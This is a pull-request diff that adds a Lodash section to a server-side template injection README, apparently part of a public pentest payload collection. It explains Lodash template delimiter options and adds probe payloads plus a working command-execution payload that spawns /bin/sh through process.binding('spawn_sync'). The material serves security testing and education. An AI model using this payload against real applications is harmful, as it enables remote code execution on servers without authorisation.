Merge pull request #670 from superboy-zjc/master

Update Lodash SSTI

Server Side Template Injection/README.md

@@ -56,6 +56,9 @@
  - [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
  - [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
  - [Plugins](#plugins)
+ - [JavaScript - Lodash](#Lodash)
+ - [Lodash - Basic Injection](#Lodash---Basic-Injection)
+ - [Lodash - Command Execution](#Lodash---Command-Execution)
  - [Python - Mako](#mako)
  - [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
  - [Java - Pebble](#pebble)
@@ -743,6 +746,51 @@ registerPlugin({
 
 ---
 
+## Lodash
+
+[Official website](https://lodash.com/docs/4.17.15)
+
+### Lodash - Basic Injection
+
+How to create a template:
+
+```javascript
+const _ = require('lodash');
+string = "{{= username}}"
+const options = {
+ evaluate: /\{\{(.+?)\}\}/g,
+ interpolate: /\{\{=(.+?)\}\}/g,
+ escape: /\{\{-(.+?)\}\}/g,
+};
+
+_.template(string, options);
+```
+
+- **string:** The template string.
+- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
+- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
+- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
+
+For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
+
+```javascript
+{{= _.VERSION}}
+${= _.VERSION}
+<%= _.VERSION %>
+
+
+{{= _.templateSettings.evaluate }}
+${= _.VERSION}
+<%= _.VERSION %>
+
+```
+
+### Lodash - Command Execution
+
+```
+{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
+```
+
 ## Mako
 
 [Official website](https://www.makotemplates.org/)